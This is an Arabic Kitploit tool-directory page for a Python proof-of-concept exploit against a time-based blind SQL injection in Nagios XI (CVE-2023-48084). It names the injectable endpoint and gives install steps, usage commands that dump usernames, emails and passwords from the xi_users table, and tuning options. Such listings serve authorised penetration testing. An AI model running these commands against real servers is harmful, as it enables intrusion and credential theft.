Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-48084-Revised — نص برمجي تجريبي (PoC) بلغة Python يستغل ثغرة SQLi العمياء القائمة على الوقت في Nagios XI لاستخراج محتويات قاعدة البيانات، مع استخراج متعدد الخيوط عبر البحث الثنائي واختيار المخطط/الجدول/العمود من سطر الأوامر (CLI). | Kitploit
أدوات/GitHubGitHub/metthk/cve-2023-48084-revised
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubmetthk/cve-2023-48084-revised

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-48084-Revised

نص برمجي تجريبي (PoC) بلغة Python يستغل ثغرة SQLi العمياء القائمة على الوقت في Nagios XI لاستخراج محتويات قاعدة البيانات، مع استخراج متعدد الخيوط عبر البحث الثنائي واختيار المخطط/الجدول/العمود من سطر الأوامر (CLI).

عرض المستودع
منذ 9 أياملم تتم المراجعة بعد

CVE-2023-48084 — PoC محدّث

المستودع: MettHK/CVE-2023-48084-Revised

نسخة محدّثة من Hamibubu/CVE-2023-48084 مع دعم تعدد الخيوط، واستخراج البحث الثنائي، وخيارات سطر أوامر لاختيار قاعدة البيانات / الجدول / العمود.

ليس المستودع الأصلي. هذا PoC مشتق/محسّن. يعود الفضل في العمل الأصلي إلى Hamibubu.

إخلاء مسؤولية

لأغراض الاختبار الأمني المصرّح به والتعليم فقط. لا تستخدم هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام.

حول الثغرة

CVE-2023-48084: يحتوي Nagios XI قبل الإصدار 5.11.3 على ثغرة حقن SQL عبر أداة التعديل الجماعي.

يستغل هذا الـ PoC ثغرة حقن SQL أعمى قائم على الوقت في:

root@kitploit:~
/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SQL)

تحتاج إلى ملف تعريف ارتباط جلسة صالح وغير إداري (nagiosxi) أو رمز API.

التغييرات عن الأصل

المتطلبات

  • Python 3.8+
  • requests (مطلوب)
  • pwntools (اختياري؛ إخراج تقدم أفضل)
root@kitploit:~
git clone https://github.com/MettHK/CVE-2023-48084-Revised.git
cd CVE-2023-48084-Revised
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# Interactive (discover schemas → tables → columns)
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -c '<cookie>'
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -a '<api_token>'

# Fast path: database + table + columns known
python3 CVE-2023-48084.py \
  -u https://target.example/nagiosxi \
  -c '<cookie>' \
  -d nagiosxi \
  -t xi_users \
  -C username,email,password \
  -w 15 \
  --delay 1.2

لا أنصح باستخدام أكثر من خيطين (workers) فقد يؤدي ذلك إلى نتائج غير صحيحة

الخيارات

نصائح

  • أحرف خاطئة / نتائج مشوشة → زد --delay (مثل 2) أو اخفض -w (مثل 5).
  • هدف مستقر وسريع → جرّب عدد خيوط أعلى (-w 15–20).
  • فضّل -d / -t / -C عندما تكون تعرف مخطط الهدف مسبقًا لتجنب الاكتشاف الطويل.
تنزيل الأداة
المجالما الذي تغيّر
الاستخراجبحث ثنائي لطول السلسلة وأحرف ASCII (طلبات أقل بكثير)
الأداءاستخراج الأحرف بتعدد الخيوط (-w / --workers)
واجهة سطر الأوامر-d / --database — تخطّي اكتشاف المخطط (schema)
واجهة سطر الأوامر-t / --table — تخطّي اكتشاف الجدول (يتطلب -d)
واجهة سطر الأوامر-C / --columns — أعمدة مفصولة بفواصل، تخطّي اكتشاف الأعمدة (يتطلب -t)
التوقيت--delay و--threshold و--max-length قابلة للضبط
المتانةجلسات HTTP لكل خيط؛ pwntools اختياري (أشرطة تقدم) مع بديل بسيط
التوثيقالإشارة/الرابط إلى الأصل؛ لا توجد أسماء مضيفين مخبرية أو عناصر CTF في الأمثلة
الخيارالوصف
-u / --urlعنوان URL الأساسي (مثل https://target.example/nagiosxi)
-c / --cookieقيمة ملف تعريف ارتباط جلسة nagiosxi
-a / --apiKeyرمز API (لا تستخدمه مع -c)
-d / --databaseاسم المخطط/قاعدة البيانات (تخطّي تعداد المخطط)
-t / --tableاسم الجدول (تخطّي تعداد الجدول؛ يتطلب -d)
-C / --columnsأعمدة مفصولة بفواصل (تخطّي تعداد الأعمدة؛ يتطلب -t)
-w / --workersخيوط متوازية (الافتراضي: 10)
--delayثواني SLEEP في الفرع الصحيح (الافتراضي: 1.5)
--thresholdالحد الأدنى لزمن الاستجابة لاعتباره إصابة (الافتراضي: delay * 0.8)
--max-lengthالحد الأعلى للبحث الثنائي عن الطول (الافتراضي: 2048)